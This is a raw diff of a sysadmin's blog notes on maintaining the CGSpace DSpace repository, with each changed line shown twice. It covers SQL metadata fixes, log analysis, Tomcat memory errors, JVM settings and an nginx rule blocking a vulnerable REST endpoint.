<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Orth, A%&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 1a1943a0-3f87-402f-9afe-e52fb46a513e | 600
(3 rows)
dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
dspacetest=# update metadatavalue set authority=&#39;1a1943a0-3f87-402f-9afe-e52fb46a513e&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Orth, %&#39;;
UPDATE 11
</code></pre><ul>
<li>And for CCAFS author Bruce Campbell that I had discussed with CCAFS earlier this week:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;0e414b4c-4671-4a23-b570-6077aca647d8&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Campbell, B%&#39;;
UPDATE 166
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Campbell, B%&#39;;
text_value | authority | confidence
------------------------+--------------------------------------+------------
Campbell, Bruce | 0e414b4c-4671-4a23-b570-6077aca647d8 | 600
@ -215,18 +215,18 @@ dspacetest=# select distinct text_value, authority, confidence from metadatavalu
<ul>
<li>After one week of logging TLS connections on CGSpace:</li>
</ul>
<pre tabindex="0"><code># zgrep &quot;DES-CBC3&quot; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
<pre tabindex="0"><code># zgrep &#34;DES-CBC3&#34; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
217
# zcat -f -- /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
1164376
# zgrep &quot;DES-CBC3&quot; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
# zgrep &#34;DES-CBC3&#34; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk &#39;{print $6}&#39; | sort | uniq
TLSv1/DES-CBC3-SHA
TLSv1/EDH-RSA-DES-CBC3-SHA
</code></pre><ul>
<li>So this represents <code>0.02%</code> of 1.16M connections over a one-week period</li>
<li>Transforming some filenames in OpenRefine so they can have a useful description for SAFBuilder:</li>
</ul>
<pre tabindex="0"><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>This gives you, for example: <code>Mainstreaming gender in agricultural R&amp;D.pdf__description:Brief</code></li>
</ul>
@ -251,7 +251,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
<li>If I unzip the original zip from CIAT on Windows, re-zip it with 7zip on Windows, and then unzip it on Linux directly, the file names seem to be proper UTF-8</li>
<li>We should definitely clean filenames so they don&rsquo;t use characters that are tricky to process in CSV and shell scripts, like: <code>,</code>, <code>'</code>, and <code>&quot;</code></li>
</ul>
<pre tabindex="0"><code>value.replace(&quot;'&quot;,&quot;&quot;).replace(&quot;,&quot;,&quot;&quot;).replace('&quot;','')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#34;&#34;).replace(&#34;,&#34;,&#34;&#34;).replace(&#39;&#34;&#39;,&#39;&#39;)
</code></pre><ul>
<li>I need to write a Python script to match that for renaming files in the file system (a rough sketch follows below)</li>
<li>When importing SAF bundles it seems you can specify the target collection on the command line using <code>-c 10568/4003</code> or in the <code>collections</code> file inside each item in the bundle</li>
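<li>A minimal sketch of what that script could look like (the directory argument and in-place rename are my assumptions, mirroring the GREL above):</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env python
# strip characters that are tricky in CSV and shell scripts from filenames
import os
import sys

target = sys.argv[1]
for name in os.listdir(target):
    clean = name.replace("'", '').replace(',', '').replace('"', '')
    if clean != name:
        os.rename(os.path.join(target, name), os.path.join(target, clean))
</code></pre>
<ul>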
@ -264,7 +264,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
<li>Import CIAT Gender Network records to CGSpace, first creating the SAF bundles as my user, then importing as the <code>tomcat7</code> user, and deleting the bundle, for each collection&rsquo;s items:</li>
</ul>
<pre tabindex="0"><code>$ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
$ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
$ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
$ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
</code></pre><h2 id="2016-09-07">2016-09-07</h2>
<ul>
@ -299,13 +299,13 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>I restarted Tomcat and it was ok again</li>
<li>CGSpace crashed a few hours later, errors from <code>catalina.out</code>:</li>
</ul>
<pre tabindex="0"><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-25&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-25&#34; java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
</code></pre><ul>
<li>We haven&rsquo;t seen that in quite a while&hellip;</li>
<li>Indeed, in a month of logs it only occurs 15 times:</li>
</ul>
<pre tabindex="0"><code># grep -rsI &quot;OutOfMemoryError&quot; /var/log/tomcat7/catalina.* | wc -l
<pre tabindex="0"><code># grep -rsI &#34;OutOfMemoryError&#34; /var/log/tomcat7/catalina.* | wc -l
15
</code></pre><ul>
<li>I also see a bunch of errors from dspace.log:</li>
@ -315,11 +315,11 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
</code></pre><ul>
<li>Looking at REST requests, it seems there is one IP hitting us nonstop:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
820 50.87.54.15
12872 70.32.99.142
25744 70.32.83.92
# awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
# awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
7966 181.118.144.29
54706 70.32.99.142
109412 70.32.83.92
@ -333,7 +333,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
</code></pre><ul>
<li>And more heap space errors:</li>
</ul>
<pre tabindex="0"><code># grep -rsI &quot;OutOfMemoryError&quot; /var/log/tomcat7/catalina.* | wc -l
<pre tabindex="0"><code># grep -rsI &#34;OutOfMemoryError&#34; /var/log/tomcat7/catalina.* | wc -l
19
</code></pre><ul>
<li>There are no more REST requests since the last crash, so maybe other things are causing this.</li>
@ -349,7 +349,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>From the activity control panel I can see 58 unique IPs hitting the site <em>concurrently</em>, which has GOT to hurt our stability</li>
<li>A list of all 2000 unique IPs from CGSpace logs today:</li>
</ul>
<pre tabindex="0"><code># grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
<pre tabindex="0"><code># grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: &#39;{print $5}&#39; | sort -n | uniq -c | sort -h | tail -n 100
</code></pre><ul>
<li>Looking at the top 20 IPs or so, most are Yahoo, MSN, Google, Baidu, TurnitIn (iParadigm), etc&hellip; do we have any real users?</li>
<li>Generate a list of all author affiliations for Peter Ballantyne to go through, make corrections, and create a lookup list from:</li>
@ -363,7 +363,7 @@ Wed Sep 14 09:47:28 UTC 2016 | Updating : 6/6 docs.
Commit
Commit done
dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-193&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-193&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>And after that I see a bunch of &ldquo;pool error Timeout waiting for idle object&rdquo;</li>
<li>Later, near the time of the next crash I see:</li>
@ -376,7 +376,7 @@ Commit done
Sep 14, 2016 11:32:22 AM com.sun.jersey.server.wadl.generators.WadlGeneratorJAXBGrammarGenerator buildModelAndSchemas
SEVERE: Failed to generate the schema for the JAX-B elements
com.sun.xml.bind.v2.runtime.IllegalAnnotationsException: 2 counts of IllegalAnnotationExceptions
java.util.Map is an interface, and JAXB can't handle interfaces.
java.util.Map is an interface, and JAXB can&#39;t handle interfaces.
this problem is related to the following location:
at java.util.Map
at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender()
@ -389,7 +389,7 @@ java.util.Map does not have a no-arg default constructor.
</code></pre><ul>
<li>Then 20 minutes later, another OutOfMemoryError:</li>
</ul>
<pre tabindex="0"><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-25&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-25&#34; java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
</code></pre><ul>
<li>Perhaps these particular issues <em>are</em> memory issues; the munin graphs definitely show some weird purging/allocating behavior starting this week</li>
@ -402,7 +402,7 @@ java.util.Map does not have a no-arg default constructor.
<li>Oh great, the configuration on the actual server is different from what&rsquo;s in configuration management!</li>
<li>Seems we added a bunch of settings to <code>/etc/default/tomcat7</code> in December 2015 and never updated our Ansible repository:</li>
</ul>
<pre tabindex="0"><code>JAVA_OPTS=&quot;-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts&quot;
<pre tabindex="0"><code>JAVA_OPTS=&#34;-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts&#34;
</code></pre><ul>
<li>So I&rsquo;m going to bump the heap +512m and remove all the other experimental shit (and update Ansible!)</li>
<li>Increased JVM heap to 4096m on CGSpace (linode01)</li>
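<li>For reference, the trimmed-down line would look something like this (a sketch; only the flags we actually understand are kept):</li>
</ul>
<pre tabindex="0"><code>JAVA_OPTS="-Djava.awt.headless=true -Xms4096m -Xmx4096m -XX:MaxPermSize=256m -Dfile.encoding=UTF-8"
</code></pre>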
@ -423,14 +423,14 @@ Thu Sep 15 18:45:26 UTC 2016 | Updating : 200/218 docs.
Thu Sep 15 18:45:27 UTC 2016 | Updating : 218/218 docs.
Commit
Commit done
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-247&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-241&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-243&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-258&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-268&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-263&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-280&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;Thread-54216&quot; org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-247&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-241&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-243&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-258&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-268&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-263&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-280&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;Thread-54216&#34; org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
-e14ef82ee224 to the index; possible analysis error.
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
@ -443,7 +443,7 @@ Exception in thread &quot;Thread-54216&quot; org.apache.solr.client.solrj.impl.H
<li>I bumped the heap space from 4096m to 5120m to see if this is <em>really</em> about heap space or not.</li>
<li>Looking into some of these errors that I&rsquo;ve seen this week but haven&rsquo;t noticed before:</li>
</ul>
<pre tabindex="0"><code># zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
<pre tabindex="0"><code># zcat -f -- /var/log/tomcat7/catalina.* | grep -c &#39;Failed to generate the schema for the JAX-B elements&#39;
113
</code></pre><ul>
<li>I&rsquo;ve sent a message to Atmire about the Solr error to see if it&rsquo;s related to their batch update module</li>
@ -474,7 +474,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
<li>Turns out the Solr search logic switched from OR to AND in DSpace 6.0 and the change is easy to backport: <a href="https://jira.duraspace.org/browse/DS-2809">https://jira.duraspace.org/browse/DS-2809</a></li>
<li>We just need to set this in <code>dspace/solr/search/conf/schema.xml</code>:</li>
</ul>
<pre tabindex="0"><code>&lt;solrQueryParser defaultOperator=&quot;AND&quot;/&gt;
<pre tabindex="0"><code>&lt;solrQueryParser defaultOperator=&#34;AND&#34;/&gt;
</code></pre><ul>
<li>It actually works really well, and search results return far fewer hits now (before, after):</li>
</ul>
@ -533,12 +533,12 @@ OCSP Response Data:
<li>Discuss fixing some ORCIDs for CCAFS author Sonja Vermeulen with Magdalena Haman</li>
<li>This author has a few variations:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
len, S%';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeu
len, S%&#39;;
</code></pre><ul>
<li>And it looks like <code>fe4b719f-6cc4-4d65-8504-7a83130b9f83</code> is the authority with the correct ORCID linked</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;fe4b719f-6cc4-4d65-8504-7a83130b9f83w&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
UPDATE 101
</code></pre><ul>
<li>Hmm, now her name is missing from the authors facet and only shows the authority ID</li>
@ -547,7 +547,7 @@ UPDATE 101
<li>On a clean snapshot of the database I see the correct authority should be <code>f01f7b7b-be3f-4df7-a61d-b73c067de88d</code>, not <code>fe4b719f-6cc4-4d65-8504-7a83130b9f83</code></li>
<li>Updating her authorities again and reindexing:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;f01f7b7b-be3f-4df7-a61d-b73c067de88d&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
UPDATE 101
</code></pre><ul>
<li>Use GitHub icon from Font Awesome instead of a PNG to save one extra network request</li>
@ -564,8 +564,8 @@ UPDATE 101
<li>Minor fix to a string in Atmire&rsquo;s CUA module (<a href="https://github.com/ilri/DSpace/pull/280">#280</a>)</li>
<li>This seems to be what I&rsquo;ll need to do for Sonja Vermeulen (but with <code>2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0</code> instead on the live site):</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;09e4da69-33a3-45ca-b110-7d3f82d2d6d2&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
dspacetest=# update metadatavalue set authority=&#39;09e4da69-33a3-45ca-b110-7d3f82d2d6d2&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen SJ%&#39;;
</code></pre><ul>
<li>And then update the Discovery and Authority indexes (see the sketch below)</li>
<li>Minor fix for &ldquo;Subject&rdquo; string in Discovery search and Atmire modules (<a href="https://github.com/ilri/DSpace/pull/281">#281</a>)</li>
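<li>Updating those indexes is presumably the usual pair of commands (a sketch):</li>
</ul>
<pre tabindex="0"><code>$ /home/cgspace.cgiar.org/bin/dspace index-discovery -b
$ /home/cgspace.cgiar.org/bin/dspace index-authority
</code></pre>
<ul>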
@ -580,7 +580,7 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
<li>DSpace Test (linode02) became unresponsive for some reason, I had to hard reboot it from the Linode console</li>
<li>People on the DSpace mailing list gave me a query to get authors from certain collections:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/5472&#39;, &#39;10568/5473&#39;)));
</code></pre><h2 id="2016-09-30">2016-09-30</h2>
<ul>
<li>Deny access to REST API&rsquo;s <code>find-by-metadata-field</code> endpoint to protect against an upstream security issue (DS-3250)</li>
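<li>One way to do that is at the nginx layer in front of Tomcat; a sketch (the exact rule is an assumption):</li>
</ul>
<pre tabindex="0"><code>location /rest/items/find-by-metadata-field {
    deny all;
}
</code></pre>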

@ -42,7 +42,7 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -168,7 +168,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
<li>CGSpace crashed a few times today</li>
<li>Generate list of unique authors in CCAFS collections:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
<pre tabindex="0"><code>dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/32729&#39;, &#39;10568/5472&#39;, &#39;10568/5473&#39;, &#39;10568/10288&#39;, &#39;10568/70974&#39;, &#39;10568/3547&#39;, &#39;10568/3549&#39;, &#39;10568/3531&#39;,&#39;10568/16890&#39;,&#39;10568/5470&#39;,&#39;10568/3546&#39;, &#39;10568/36024&#39;, &#39;10568/66581&#39;, &#39;10568/21789&#39;, &#39;10568/5469&#39;, &#39;10568/5468&#39;, &#39;10568/3548&#39;, &#39;10568/71053&#39;, &#39;10568/25167&#39;))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
</code></pre><h2 id="2016-10-05">2016-10-05</h2>
<ul>
<li>Work on more infrastructure cleanups for Ansible DSpace role</li>
@ -190,7 +190,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
<li>Re-deploy CGSpace with latest changes from late September and early October</li>
<li>Run fixes for ILRI subjects and delete blank metadata values:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 11
</code></pre><ul>
<li>Run all system updates and reboot CGSpace</li>
@ -211,7 +211,7 @@ DELETE 11
<ul>
<li>A bit more cleanup on the CCAFS authors, and run the corrections on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t &#39;correct name&#39; -m 3 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>One observation is that there are still some old versions of names in the author lookup because authors appear in other communities (as we only corrected authors from CCAFS for this round)</li>
</ul>
@ -253,35 +253,35 @@ $ git rebase -i dspace-5.5
<li>Start testing some things for DSpace 5.5, like command line metadata import, PDF media filter, and Atmire CUA</li>
<li>Start looking at batch fixing of &ldquo;old&rdquo; ILRI website links without www or https, for example:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like &#39;http://ilri.org%&#39;;
</code></pre><ul>
<li>Also CCAFS has HTTPS and their links should use it where possible:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like &#39;http://ccafs.cgiar.org%&#39;;
</code></pre><ul>
<li>And this will find community and collection HTML text that is using the old style PNG/JPG icons for RSS and email (we should be using Font Awesome icons instead):</li>
</ul>
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like &#39;%Iconrss2.png%&#39;;
</code></pre><ul>
<li>Turns out there are shit tons of varieties of this, like with http, https, www, separate <code>&lt;/img&gt;</code> tags, alignments, etc</li>
<li>Had to find all variations and replace them individually:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;','&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;&gt;&lt;/img&gt;%';
